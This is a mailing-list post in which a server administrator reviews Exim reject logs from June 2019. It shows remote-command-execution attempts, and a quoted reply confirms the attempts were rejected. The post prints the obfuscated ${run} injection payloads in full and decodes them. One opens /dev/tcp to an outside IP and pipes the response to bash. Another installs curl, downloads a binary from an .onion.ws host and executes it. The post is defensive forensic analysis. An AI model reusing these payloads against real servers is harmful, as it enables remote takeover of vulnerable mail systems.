Phew... I think?! The depressing thing is that there's no way to know for
sure whether I patched in time, even with things like rkhunter already in
place. Thanks again to Andy, without whose warning I would definitely not
have known to patch my exim quickly enough! I patched 15 days ago (7th
June), and I see 15 remote exploit attempts in the rejectlogs from the last
7 days alone - unfortunately my logrotate already ditched logs from the
previous week.
Some of the attacks obfuscate the payload or source IP of the attacker, e.g.
/var/log/exim4/rejectlog-20190615.gz:2019-06-14 15:26:49 H=
dyndsl-031-150-241-251.ewe-ip-backbone.de (localhost) [31.150.241.251] F=<>
rejected RCPT
<${run{\x2Fbin\x2Fsh\t-c\t\x22echo\x20ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KY3VybCAtViB8fCBhcHQtZ2V0IC15IGluc3RhbGwgY3VybCB8fCB5dW0gLXkgaW5zdGFsbCBjdXJsCmN1cmwgLW0xODAgLWZzU0xrQS0gYXB0Z2V0Z3hxczNzZWNkYS5vbmlvbi53cy9zeXN0ZW1kLWxvZ2luLWUgLW8gL3RtcC9leGltCmNobW9kICt4IC90bXAvZXhpbSAmJiAvdG1wL2V4aW0K\x7cbase64\x20-d\x7cbash\x22}}@localhost>:
Unrouteable address
/var/log/exim4/rejectlog-20190616.gz:2019-06-15 22:39:42 H=(localhost)
[163.172.157.143] F=<> rejected RCPT
<root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost>:
Unrouteable address
/var/log/exim4/rejectlog-20190616.gz:2019-06-15 23:13:22 H=(localhost)
[51.15.227.108] F=<localuser@localhost> rejected RCPT
<root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x63\x68\x6f\x20\x74\x65\x73\x74\x22\x20\x26}}@localhost>:
Sender verify failed
/var/log/exim4/rejectlog-20190617.gz:2019-06-16 10:07:08 H=(localhost)
[163.172.157.143] F=<> rejected RCPT
<root+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x31\x35\x2e\x35\x36\x2e\x31\x36\x31\x2f\x34\x34\x33\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26}}@localhost>:
Unrouteable address
Some quick forensics gives an idea of the attack approaches:
$ perl -le 'print
"{run{\x2Fbin\x2Fsh\t-c\t\x22echo\x20ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KY3VybCAtViB8fCBhcHQtZ2V0IC15IGluc3RhbGwgY3VybCB8fCB5dW0gLXkgaW5zdGFsbCBjdXJsCmN1cmwgLW0xODAgLWZzU0xrQS0gYXB0Z2V0Z3hxczNzZWNkYS5vbmlvbi53cy9zeXN0ZW1kLWxvZ2luLWUgLW8gL3RtcC9leGltCmNobW9kICt4IC90bXAvZXhpbSAmJiAvdG1wL2V4aW0K\x7cbase64\x20-d\x7cbash\x22}}@localhost>"'
{run{/bin/sh -c "echo
ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KY3VybCAtViB8fCBhcHQtZ2V0IC15IGluc3RhbGwgY3VybCB8fCB5dW0gLXkgaW5zdGFsbCBjdXJsCmN1cmwgLW0xODAgLWZzU0xrQS0gYXB0Z2V0Z3hxczNzZWNkYS5vbmlvbi53cy9zeXN0ZW1kLWxvZ2luLWUgLW8gL3RtcC9leGltCmNobW9kICt4IC90bXAvZXhpbSAmJiAvdG1wL2V4aW0K|base64
-d|bash"}}>
$ echo
ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFUSD0kUEFUSDovYmluOi9zYmluOi91c3IvYmluOi91c3Ivc2JpbjovdXNyL2xvY2FsL2JpbjovdXNyL2xvY2FsL3NiaW4KY3VybCAtViB8fCBhcHQtZ2V0IC15IGluc3RhbGwgY3VybCB8fCB5dW0gLXkgaW5zdGFsbCBjdXJsCmN1cmwgLW0xODAgLWZzU0xrQS0gYXB0Z2V0Z3hxczNzZWNkYS5vbmlvbi53cy9zeXN0ZW1kLWxvZ2luLWUgLW8gL3RtcC9leGltCmNobW9kICt4IC90bXAvZXhpbSAmJiAvdG1wL2V4aW0K|base64
-d
exec &>/dev/null
export
PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
curl -V || apt-get -y install curl || yum -y install curl
curl -m180 -fsSLkA- aptgetgxqs3secda.onion.ws/systemd-login-e -o /tmp/exim
chmod +x /tmp/exim && /tmp/exim
$ curl -m180 -fsSLkA- aptgetgxqs3secda.onion.ws/systemd-login-e -o exim
curl: (22) The requested URL returned error: 404 Not Found
$ perl -le 'print
"\x20\x2dc\x20\x22\x65\x78\x65\x63\x20\x35\x3c\x3e\x2f\x64\x65\x76\x2f\x74\x63\x70\x2f\x35\x31\x2e\x33\x38\x2e\x31\x33\x33\x2e\x32\x33\x32\x2f\x38\x30\x3b\x65\x63\x68\x6f\x20\x2d\x65\x20\x27\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x5c\x6e\x27\x20\x3e\x26\x35\x3b\x74\x61\x69\x6c\x20\x2d\x6e\x20\x2b\x31\x31\x20\x3c\x26\x35\x20\x7c\x20\x62\x61\x73\x68\x22\x20\x26"'
-c "exec 5<>/dev/tcp/51.38.133.232/80;echo -e 'GET / HTTP/1.0\n' >&5;tail
-n +11 <&5 | bash" &
I'm not sure how sophisticated these would have been at covering their
tracks if they had succeeded - one would expect that they'd remove
/tmp/exim at very least. But it seems pretty likely that if your exim was
vulnerable and hasn't yet been patched, you've already been hacked.
On Sun, 23 Jun 2019 at 07:30, Andy Smith <andy@???> wrote:
> Hello,
>
> On Sun, Jun 23, 2019 at 07:20:53AM +0100, John Winters wrote:
> > On 23/06/2019 04:24, Andy Smith wrote:
> > > 2019-06-19 14:57:19 H=li810-176.members.linode.com (service.com)
> [104.237.134.176] F=<support@???> rejected RCPT
> <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2f85.119.82.70\
> x22}}@???>: Unrouteable address
> >
> > Am I right in thinking that the fact that the log entry says "rejected
> > RCPT" etc. means that the attack has been thwarted?
>
> Yes.
>
> Cheers,
> Andy
>
> --
> https://bitfolk.com/ -- No-nonsense VPS hosting
> _______________________________________________
> users mailing list
> users@???
> https://lists.bitfolk.com/mailman/listinfo/users
>
